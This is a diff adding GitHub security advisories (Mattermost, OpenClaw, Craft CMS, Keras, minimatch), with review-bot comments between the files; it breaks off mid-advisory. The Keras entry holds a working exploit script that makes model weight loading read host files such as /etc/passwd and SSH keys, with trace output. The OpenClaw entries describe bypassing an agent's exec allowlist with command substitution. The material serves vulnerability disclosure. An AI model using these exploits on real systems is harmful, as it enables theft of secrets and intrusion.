@@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c9r-7f29-qp32", + "modified": "2026-02-19T19:34:56Z", + "published": "2026-02-16T12:30:24Z", + "aliases": [ + "CVE-2026-0999" + ], + "summary": "Mattermost fails to properly validate login method restrictions", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate login method restrictions which allows an authenticated user to bypass SSO-only login requirements via userID-based authentication. Mattermost Advisory ID: MMSA-2025-00548", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost/server/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0-20251212052346-61651b0df7ea" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.1.3" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 10.11.10" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.2.2" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": 
"5.3.2-0.20251212052346-61651b0df7ea" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0999" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/61651b0df7ea5db55d1e54f8d6fb5fce4149309c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:34:56Z", + "nvd_published_at": "2026-02-16T10:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json new file mode 100644 index 0000000000000..6dbb90ce41f2d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json 
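Review bot: The three `github.com/mattermost/mattermost-server` entries introduced at `"11.1.0"`, `"10.11.0"` and `"11.2.0"` have no closing event, so an OSV-style range matcher treats every later version — including 11.1.3, 10.11.10 and 11.2.2, which `details` and the `last_known_affected_version_range` hints describe as the first unaffected releases — as affected; `database_specific` is not consulted for matching, so the hint does not bound anything. Adding a `last_affected` event to each (`{ "last_affected": "11.1.2" }`, and likewise `"10.11.9"` and `"11.2.1"`), the form this same commit uses for `clawdbot` in GHSA-3fqr-4cg8-h96q, bounds the ranges without asserting a `fixed` tag that may not exist as a Go module version. As written, the open-ended `11.1.0` range also fully contains the `11.2.0` entry, which is a symptom of the same missing bounds.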
@@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fqr-4cg8-h96q", + "modified": "2026-02-20T16:46:03Z", + "published": "2026-02-18T00:53:59Z", + "aliases": [ + "CVE-2026-26317" + ], + "summary": "OpenClaw affected by cross-site request forgery (CSRF) through loopback browser mutation endpoints", + "details": "## Summary\nBrowser-facing localhost mutation routes accepted cross-origin browser requests without explicit Origin/Referer validation. Loopback binding reduces remote exposure but does not prevent browser-initiated requests from malicious origins.\n\n## Impact\nA malicious website can trigger unauthorized state changes against a victim's local OpenClaw browser control plane (for example opening tabs, starting/stopping the browser, mutating storage/cookies) if the browser control service is reachable on loopback in the victim's browser context.\n\n## Affected Packages / Versions\n- openclaw (npm): <= 2026.2.13\n- clawdbot (npm): <= 2026.1.24-3\n\n## Details\nThe browser control servers bind to loopback but exposed mutating HTTP endpoints without a CSRF-style guard. Browsers may send cross-origin requests to loopback addresses; without explicit validation, state-changing operations could be triggered from a non-loopback Origin/Referer.\n\n## Fix\nMutating HTTP methods (POST/PUT/PATCH/DELETE) are rejected when the request indicates a non-loopback Origin/Referer (or `Sec-Fetch-Site: cross-site`).\n\n## Fix Commit(s)\n- openclaw/openclaw: b566b09f81e2b704bf9398d8d97d5f7a90aa94c3\n\n## Workarounds / Mitigations\n- Enable browser control auth (token/password) and avoid running with auth disabled.\n- Upgrade to a release that includes the fix.\n\n## Credits\n- Reporter: @vincentkoc\n\n## Release Process Note\n`patched_versions` is set to the planned next release version. 
Once that npm release is published, the advisory should be ready to publish with no further edits.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fqr-4cg8-h96q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26317" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b566b09f81e2b704bf9398d8d97d5f7a90aa94c3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:53:59Z", + "nvd_published_at": "2026-02-19T22:16:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3hcm-ggvf-rch5/GHSA-3hcm-ggvf-rch5.json b/advisories/github-reviewed/2026/02/GHSA-3hcm-ggvf-rch5/GHSA-3hcm-ggvf-rch5.json new file mode 100644 index 0000000000000..a4c672bb17826 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3hcm-ggvf-rch5/GHSA-3hcm-ggvf-rch5.json 
@@ -0,0 +1,63 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3hcm-ggvf-rch5",
+ "modified": "2026-02-17T16:46:12Z",
+ "published": "2026-02-17T16:46:12Z",
+ "aliases": [],
+ "summary": "OpenClaw has an exec allowlist bypass via command substitution/backticks inside double quotes",
+ "details": "### Summary\n\nExec approvals allowlist bypass via command substitution/backticks inside double quotes.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.1`\n- Fixed: `>= 2026.2.2`\n\n### Impact\n\nOnly affects setups that explicitly enable the optional exec approvals allowlist feature. Default installs are unaffected.\n\n### Fix\n\nReject unescaped `$()` and backticks inside double quotes during allowlist analysis.\n\n### Fix Commit(s)\n\n- d1ecb46076145deb188abcba8f0699709ea17198\n\nThanks @simecek for reporting.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "openclaw"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2026.2.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3hcm-ggvf-rch5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/d1ecb46076145deb188abcba8f0699709ea17198"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/openclaw/openclaw"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-17T16:46:12Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json new file mode 100644 index 0000000000000..ae3676244f566 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json 
@@ -0,0 +1,86 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jh3-prx3-w6wc", + "modified": "2026-02-23T22:15:03Z", + "published": "2026-02-23T22:15:03Z", + "aliases": [ + "CVE-2026-27126" + ], + "summary": "Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type", + "details": "A stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.\n\n## Prerequisites\n* An administrator account\n* `allowAdminChanges` must be enabled in production, which is [against our security recommendations](https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production).\n\n## Steps to Reproduce\n1. Navigate to **Settings** → **Fields** and create a new field with Type: **Table**\n1. Add a **Column Heading** and set **Column Type** to `Single-line text`\n - **Note:** The vulnerable **Column Type** is `html`, but it's not available in the UI dropdown.\n1. In **Default Values** section, add a row with the following payload:\n ```html\n \n ```\n1. Enable `Static Rows`\n1. Intercept the **Save Field** request using a proxy tool (e.g., Burp Suite) or use `cURL` directly\n1. Modify the request body and change the `types[craft-fields-Table][columns][col3][type]` parameter from `singleline` to `html`\n1. Forward the request to save the field\n1. Use the field in any object (e.g. user profile fields) → then visit the any user's profile\n1. Notice the XSS execution\n1. 
The XSS will also trigger when an administrator attempts to edit this field, as the malicious payload is executed within the field configuration page, too.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:15:03Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json b/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json new file mode 100644 index 0000000000000..733bb027dc399 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json 
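Review bot: Step 3 of the reproduction in `details` has an empty fenced block — the text is `add a row with the following payload:\n ```html\n \n ```\n` — where the payload was evidently stripped on export, so the step now instructs the reader to add nothing. Rather than restoring the markup, the step should describe it (`a row whose value is an HTML string containing a script element`), which is all a defender needs to recognise the issue and keeps the advisory free of a copy-pasteable payload; the referenced commit already carries the technical detail. The `## Resources` section lists the fix commit as a bare URL that duplicates the `references` entry; a label such as `Fixed in commit f5d488d9…` would tell readers what the link is.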
@@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m3q-x3gj-f79x", + "modified": "2026-02-17T21:31:58Z", + "published": "2026-02-17T21:31:58Z", + "aliases": [], + "summary": "OpenClaw optional voice-call plugin: webhook verification may be bypassed behind certain proxy configurations", + "details": "## Affected Packages / Versions\n\nThis issue affects the optional voice-call plugin only. It is not enabled by default; it only applies to installations where the plugin is installed and enabled.\n\n- Package: `@openclaw/voice-call`\n- Vulnerable versions: `< 2026.2.3`\n- Patched versions: `>= 2026.2.3`\n\nLegacy package name (if you are still using it):\n\n- Package: `@clawdbot/voice-call`\n- Vulnerable versions: `<= 2026.1.24`\n- Patched versions: none published under this package name; migrate to `@openclaw/voice-call`\n\n## Summary\n\nIn certain reverse-proxy / forwarding setups, webhook verification can be bypassed if untrusted forwarded headers are accepted.\n\n## Impact\n\nAn external party may be able to send voice-call webhook requests that are accepted as valid, which can result in spoofed webhook events being processed.\n\n## Root Cause\n\nSome deployments implicitly trusted forwarded headers (for example `Forwarded` / `X-Forwarded-*`) when determining request properties used during webhook verification. If those headers are not overwritten by a trusted proxy, a client can supply them directly and influence verification.\n\n## Resolution\n\nIgnore forwarded headers by default unless explicitly trusted and allowlisted in configuration. Keep any loopback-only development bypass restricted to local development only. 
Upgrade to a patched version.\n\nIf you cannot upgrade immediately, strip `Forwarded` and `X-Forwarded-*` headers at the edge so clients cannot supply them directly.\n\n## Fix Commit(s)\n\n- `a749db9820eb6d6224032a5a34223d286d2dcc2f`\n\n## Credits\n\nThanks `@0x5t` for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@openclaw/voice-call" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "@clawdbot/voice-call" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3m3q-x3gj-f79x" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/a749db9820eb6d6224032a5a34223d286d2dcc2f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:31:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json new file mode 100644 index 0000000000000..2ffb92e093878 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json 
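Review bot: `cwe_ids` carries only `CWE-287`, while the `## Root Cause` section describes trusting client-suppliable `Forwarded`/`X-Forwarded-*` headers in a verification decision, which is the specific weakness CWE-348 (Use of Less Trusted Source) names; adding `"CWE-348"` alongside the generic CWE-287 makes the record group with other forwarded-header advisories. The `## Resolution` section mixes what the library now does (`Ignore forwarded headers by default unless explicitly trusted and allowlisted in configuration`) with operator steps; one sentence stating that an upgrade to `2026.2.3` restores verification with no configuration change, and that the allowlist is only needed when forwarded headers must be honoured, would let deployers tell whether upgrading alone is sufficient (hedged: that reading is inferred from the Resolution text, not stated by it).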
@@ -0,0 +1,97 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m4q-jmj6-r34q", + "modified": "2026-02-18T22:41:58Z", + "published": "2026-02-18T22:41:58Z", + "aliases": [ + "CVE-2026-1669" + ], + "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading", + "details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 “external storage” and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. 
**Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home//.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025‑10‑19)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n - `tensorflow==2.20.0`\n - `keras==3.11.3`\n - `h5py==3.15.1`\n - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to 
capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -> Path:\n candidates = [\n os.environ.get(\"KFLI_PATH\"),\n \"/etc/machine-id\",\n \"/etc/hostname\",\n \"/proc/sys/kernel/hostname\",\n \"/etc/passwd\",\n ]\n for candidate in candidates:\n if not candidate:\n continue\n path = Path(candidate)\n if path.exists() and path.is_file():\n return path\n raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -> tf.keras.Model:\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(1,), name=\"input\"),\n tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n ])\n model(tf.zeros((1, 1))) # build weights\n return model\n\ndef find_bias_dataset(h5file: h5py.File) -> str:\n matches: list[str] = []\n def visit(name: str, obj) -> None:\n if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n matches.append(name)\n h5file.visititems(visit)\n if not matches:\n raise RuntimeError(\"bias dataset not found\")\n return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:\n with h5py.File(path, \"r+\") as h5file:\n bias_path = find_bias_dataset(h5file)\n parent = h5file[str(Path(bias_path).parent)]\n dset_name = Path(bias_path).name\n del parent[dset_name]\n max_bytes = 128\n size = host_file.stat().st_size\n nbytes = min(size, max_bytes)\n nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing\n units = max(1, nbytes // 4)\n parent.create_dataset(\n dset_name,\n shape=(units,),\n dtype=\"float32\",\n external=[(host_file.as_posix(), 0, nbytes)],\n )\n return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -> tuple[str, 
str]:\n raw = np.ascontiguousarray(arr).view(np.uint8)\n ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n hex_preview = raw[:64].tobytes().hex()\n return ascii_preview, hex_preview\n\ndef main() -> None:\n host_file = choose_host_file()\n model = build_model(units=32)\n\n weights_path = Path(\"weights_demo.h5\")\n model.save_weights(weights_path.as_posix())\n\n units, nbytes = rewrite_bias_external(weights_path, host_file)\n print(\"secret_text_source\", host_file)\n print(\"units\", units, \"bytes_mapped\", nbytes)\n\n model.load_weights(weights_path.as_posix())\n output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n ascii_preview, hex_preview = floats_to_ascii(output)\n print(\"recovered_ascii\", ascii_preview)\n print(\"recovered_hex64\", hex_preview)\n\n saved = Path(\"weights_demo_resaved.h5\")\n model.save_weights(saved.as_posix())\n print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n - `secret_text_source` prints the chosen host file path.\n - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n 1. **External storage dataset**: dataset references `/etc/hosts`.\n 2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n 3. 
**Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n - Inspect creation property lists (`get_external_count`) before materialising tensors.\n - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. 
**Regression coverage**:\n - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025‑10‑18**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025‑10‑19**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.13.0" + }, + { + "fixed": "3.13.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.12.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/pull/22057" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553" + }, + { + "type": "PACKAGE", + "url": "https://github.com/keras-team/keras" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1" + }, + { + "type": 
"WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:41:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json new file mode 100644 index 0000000000000..e62b787b379c0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json 
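Review bot: The `affected` array lists only the PyPI `keras` package, while the details' Scope line states the issue "Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible" and the verification section pins `tensorflow==2.20.0`; either add an affected entry for the TensorFlow package (if the maintainers confirm the legacy `tf.keras` loader is in scope) or qualify the prose so the machine-readable scope matches it. The path `/home//.ssh/id_rsa` in the Attacker Scenario has lost a placeholder between the slashes, presumably an angle-bracketed username stripped on import; restore it as `/home/<user>/.ssh/id_rsa` or similar. The two keras ranges (3.0.0 fixed at 3.12.1, and 3.13.0 fixed at 3.13.2) leave 3.12.1 through the rest of 3.12.x unaffected, which reads as intended but deserves a one-line statement in the details, since the prose only says "Keras (3.x)".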
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3ppc-4f35-3m26", + "modified": "2026-02-20T16:52:14Z", + "published": "2026-02-18T22:38:11Z", + "aliases": [ + "CVE-2026-26996" + ], + "summary": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern", + "details": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups 